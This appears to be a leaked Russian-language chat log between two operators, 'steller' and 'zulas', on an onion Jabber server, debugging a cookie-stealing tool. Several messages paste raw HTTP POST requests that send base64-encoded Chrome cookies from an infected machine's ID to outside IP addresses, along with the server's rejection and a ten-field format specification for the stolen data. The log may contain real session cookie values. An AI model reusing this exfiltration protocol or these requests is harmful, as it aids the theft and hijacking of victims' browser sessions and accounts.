{
    "2021-09-03T11:49:17.685502": {
        "src": "steller@q3mcco35auwcstmt.onion",
        "dst": "zulas@q3mcco35auwcstmt.onion",
        "body": "Привет.\nФормат куков когда приблизительно будет исправлен?"
    },
    "2021-09-13T11:40:14.114605": {
        "src": "steller@q3mcco35auwcstmt.onion",
        "dst": "zulas@q3mcco35auwcstmt.onion",
        "body": "Привет."
    },
    "2021-09-13T11:40:21.479277": {
        "src": "steller@q3mcco35auwcstmt.onion",
        "dst": "zulas@q3mcco35auwcstmt.onion",
        "body": "Отпиши, как будешь"
    },
    "2021-09-13T15:15:49.964056": {
        "src": "steller@q3mcco35auwcstmt.onion",
        "dst": "zulas@q3mcco35auwcstmt.onion",
        "body": "Привет."
    },
    "2021-09-13T15:15:49.964522": {
        "src": "steller@q3mcco35auwcstmt.onion",
        "dst": "zulas@q3mcco35auwcstmt.onion",
        "body": "Отпиши, как будешь"
    },
    "2021-09-13T15:32:26.092981": {
        "src": "zulas@q3mcco35auwcstmt.onion",
        "dst": "steller@q3mcco35auwcstmt.onion",
        "body": "привет . отписал"
    },
    "2021-09-14T09:11:27.669649": {
        "src": "zulas@q3mcco35auwcstmt.onion",
        "dst": "steller@q3mcco35auwcstmt.onion",
        "body": "привет . отписал"
    },
    "2021-09-14T09:18:19.267357": {
        "src": "steller@q3mcco35auwcstmt.onion",
        "dst": "zulas@q3mcco35auwcstmt.onion",
        "body": "403 ошибка идёт. Ты делал куки?"
    },
    "2021-09-14T10:05:14.669719": {
        "src": "steller@q3mcco35auwcstmt.onion",
        "dst": "zulas@q3mcco35auwcstmt.onion",
        "body": "403 ошибка идёт. Ты делал куки?"
    },
    "2021-09-14T10:05:41.657247": {
        "src": "zulas@q3mcco35auwcstmt.onion",
        "dst": "steller@q3mcco35auwcstmt.onion",
        "body": "какие куки ?"
    },
    "2021-09-16T06:01:39.942111": {
        "src": "zulas@q3mcco35auwcstmt.onion",
        "dst": "steller@q3mcco35auwcstmt.onion",
        "body": "какие куки ?"
    },
    "2021-09-16T06:05:07.486088": {
        "src": "steller@q3mcco35auwcstmt.onion",
        "dst": "zulas@q3mcco35auwcstmt.onion",
        "body": "О которых в конфе говорили. Приём."
    },
    "2021-09-16T06:26:09.035453": {
        "src": "steller@q3mcco35auwcstmt.onion",
        "dst": "zulas@q3mcco35auwcstmt.onion",
        "body": "О которых в конфе говорили. Приём."
    },
    "2021-09-16T06:42:02.723898": {
        "src": "zulas@q3mcco35auwcstmt.onion",
        "dst": "steller@q3mcco35auwcstmt.onion",
        "body": "что то напомни .."
    },
    "2021-09-16T09:01:07.092728": {
        "src": "zulas@q3mcco35auwcstmt.onion",
        "dst": "steller@q3mcco35auwcstmt.onion",
        "body": "что то напомни .."
    },
    "2021-09-16T09:07:10.889348": {
        "src": "steller@q3mcco35auwcstmt.onion",
        "dst": "zulas@q3mcco35auwcstmt.onion",
        "body": "У нас проблема с форматом\n\nPOST /TST150/WIN-D92SKISQ0JG_W639600.579036FF7F1C6D1A25B3F315D688968E/84/ HTTP/1.1\nAccept: */*\nContent-Type: multipart/form-data; boundary=---------TVFKCUFMPNCVPDLI\nConnection: Close\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)\nHost: 45.230.176.157:443\nContent-Length: 499\nCache-Control: no-cache\n\n-----------TVFKCUFMPNCVPDLI\nContent-Disposition: form-data; name=\"data\"\n\nuser|Chrome|Lmdvb2dsZS5jb20=|QU5JRA==|QUhXcVRVa3I0ZWhzWDY0ZW00S3JTMFprc2h0d0VzdXlsanBoNm5XOE1KZFg4NlJkMExNbEl6YmotMk9kNFFaQQ==|1588241125|1651313125|Lw==\nuser|Chrome|LnJlZ2lzdGVyLmNvbQ==|X191dG1h|MTk1NDMxOTg3LjU5MDA3MzIyNy4xNTg4MjQxMTQ0LjE1ODgyNDExNDQuMTU4ODI0MTE0NC4x|1588241143|1651313173|Lw==\n-----------TVFKCUFMPNCVPDLI\nContent-Disposition: form-data; name=\"source\"\n\nChrome cookies\n-----------TVFKCUFMPNCVPDLI--\n\n\n\nHTTP/1.1 403 Forbidden\nconnection: close\nserver: Cowboy\ndate: Tue, 17 Aug 2021 13:17:25 GMT\ncontent-length: 26\nForbidden: text/plain\n\nMismatch parameters count!"
    },
    "2021-09-16T09:11:32.643557": {
        "src": "zulas@q3mcco35auwcstmt.onion",
        "dst": "steller@q3mcco35auwcstmt.onion",
        "body": "надо в логи смотреть там будет конкретнее сказано"
    },
    "2021-09-16T09:11:53.934382": {
        "src": "zulas@q3mcco35auwcstmt.onion",
        "dst": "steller@q3mcco35auwcstmt.onion",
        "body": "там в нескольких местах может быть"
    },
    "2021-09-16T09:12:06.182912": {
        "src": "zulas@q3mcco35auwcstmt.onion",
        "dst": "steller@q3mcco35auwcstmt.onion",
        "body": "либо какая ошибка исполнения .. либо в CSV неправильный формат"
    },
    "2021-09-16T09:13:35.272751": {
        "src": "steller@q3mcco35auwcstmt.onion",
        "dst": "zulas@q3mcco35auwcstmt.onion",
        "body": "Посмотри пож-ста. Драйвер говорит, что ему удавалось нормально отправлять. Возможно, это зависит на какой сервер прокладка указывает или ещё от чего-то"
    },
    "2021-09-16T09:15:32.272068": {
        "src": "zulas@q3mcco35auwcstmt.onion",
        "dst": "steller@q3mcco35auwcstmt.onion",
        "body": "у тебя 8 колонок в csv ?"
    },
    "2021-09-16T09:15:39.357898": {
        "src": "zulas@q3mcco35auwcstmt.onion",
        "dst": "steller@q3mcco35auwcstmt.onion",
        "body": "я правильно подсчитал ?"
    },
    "2021-09-16T09:20:51.790263": {
        "src": "steller@q3mcco35auwcstmt.onion",
        "dst": "zulas@q3mcco35auwcstmt.onion",
        "body": "Старый запрос скинул, но в новом 10 полей и та же ошибка приходит.\n\nНовый формат:\n<b64(Username)>|<Browser>|<b64(Domain)|<b64(Cookie_name)>|<b64(Cookie_value)>|\n        <Created,unix,Sec>|<Expires,unix,Sec>|<b64(Path)>|<IsSecure>|<IsHttpOnly>"
    },
    "2021-09-16T09:21:17.488775": {
        "src": "steller@q3mcco35auwcstmt.onion",
        "dst": "zulas@q3mcco35auwcstmt.onion",
        "body": "Сек. Поищу новый запрос."
    },
    "2021-09-16T09:22:30.267579": {
        "src": "steller@q3mcco35auwcstmt.onion",
        "dst": "zulas@q3mcco35auwcstmt.onion",
        "body": "\n\nPOST /TST150/WIN-D92SKISQ0JG_W639600.579036FF7F1C6D1A25B3F315D688968E/84/ HTTP/1.1\nAccept: */*\nContent-Type: multipart/form-data; boundary=---------ILIRTLGXDQADQZQV\nConnection: Close\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)\nHost: 63.147.234.198:443\nContent-Length: 917\nCache-Control: no-cache\n\n-----------ILIRTLGXDQADQZQV\nContent-Disposition: form-data; name=\"data\"\n\ndXNlcg==|Chrome|Lmdvb2dsZS5jb20=|QU5JRA==|QUhXcVRVa3I0ZWhzWDY0ZW00S3JTMFprc2h0d0VzdXlsanBoNm5XOE1KZFg4NlJkMExNbEl6YmotMk9kNFFaQQ==|1588241125|1651313125|Lw==|1|1\ndXNlcg==|Chrome|LnJlZ2lzdGVyLmNvbQ==|X191dG1h|MTk1NDMxOTg3LjU5MDA3MzIyNy4xNTg4MjQxMTQ0LjE1ODgyNDExNDQuMTU4ODI0MTE0NC4x|1588241143|1651313173|Lw==|0|0\ndXNlcg==|Chrome|Lmdvb2dsZS5jb20=|MVBfSkFS|MjAyMS0wOC0yMC0wNg==|1629440823|1632032823|Lw==|1|0\ndXNlcg==|Chrome|Lmdvb2dsZS5jb20=|TklE|MjIxPUlqcVRFLTlnYWpWUWNnTUgyNGVUcFBJMmFQYkYzZUJSamJOWXlDSXF1dXFhb2ttbktrNHk4THhOcVMzNm1LU0VpS0tLSjBISU5EdjZaUG4tcVJvZEMwbnZsWEhMZ2k3Vmx1eW92Z3VDQkttMksyNi1Md0dsYzJXTkNYbmtLWC1pa3NJczFNUEQzSExuNU1IX3dWQnQ4TExVdXRxT2dVMzlFVDhkeFktU2lGVQ==|1629440823|1645252023|Lw==|1|1\n-----------ILIRTLGXDQADQZQV\nContent-Disposition: form-data; name=\"source\"\n\nChrome cookies\n-----------ILIRTLGXDQADQZQV--\n\n[9/9/2021 6:58:09 PM:880]\nHTTP/1.1 403 Forbidden\nconnection: close\nserver: Cowboy\ndate: Thu, 09 Sep 2021 15:58:11 GMT\ncontent-length: 26\nForbidden: text/plain\n\nMismatch parameters count!"
    },
    "2021-09-16T09:25:21.197467": {
        "src": "zulas@q3mcco35auwcstmt.onion",
        "dst": "steller@q3mcco35auwcstmt.onion",
        "body": "вот хз тут"
    },
    "2021-09-16T09:25:32.202231": {
        "src": "zulas@q3mcco35auwcstmt.onion",
        "dst": "steller@q3mcco35auwcstmt.onion",
        "body": "логи надо смотреть"
    },
    "2021-09-16T09:25:38.449361": {
        "src": "zulas@q3mcco35auwcstmt.onion",
        "dst": "steller@q3mcco35auwcstmt.onion",
        "body": "может какая ошибка"
    },
    "2021-09-16T09:34:05.168648": {
        "src": "steller@q3mcco35auwcstmt.onion",
        "dst": "zulas@q3mcco35auwcstmt.onion",
        "body": "У нас с B64 и utf8 были проблемы."
    },
    "2021-09-16T09:37:03.204313": {
        "src": "zulas@q3mcco35auwcstmt.onion",
        "dst": "steller@q3mcco35auwcstmt.onion",
        "body": "ну он пишет данные как они есть . они там все  такстовые же"
    },
    "2021-09-16T09:37:45.514401": {
        "src": "zulas@q3mcco35auwcstmt.onion",
        "dst": "steller@q3mcco35auwcstmt.onion",
        "body": "я пока занят не могу тобой полностью занятся . скорее всего только на след неделе .. так что попробуй сам до лога дойти моего .. если там отображается . то попробую исправить"
    },
    "2021-09-16T09:37:47.693762": {
        "src": "zulas@q3mcco35auwcstmt.onion",
        "dst": "steller@q3mcco35auwcstmt.onion",
        "body": "по быстрому"
    },
    "2021-09-16T09:38:45.486445": {
        "src": "steller@q3mcco35auwcstmt.onion",
        "dst": "zulas@q3mcco35auwcstmt.onion",
        "body": "Мной не нужно заниматься, я в отпуск еду))\nА вот исправить проблемы с форматом было бы хорошо."
    },
    "2021-09-16T09:39:37.680775": {
        "src": "steller@q3mcco35auwcstmt.onion",
        "dst": "zulas@q3mcco35auwcstmt.onion",
        "body": "Кроме тебя ещё кто-то правит исходники?"
    },
    "2021-09-16T09:41:14.933914": {
        "src": "zulas@q3mcco35auwcstmt.onion",
        "dst": "steller@q3mcco35auwcstmt.onion",
        "body": "нет"
    },
    "2021-09-16T09:42:00.809219": {
        "src": "zulas@q3mcco35auwcstmt.onion",
        "dst": "steller@q3mcco35auwcstmt.onion",
        "body": "ну как минимум деф может логи посмотреть"
    }
}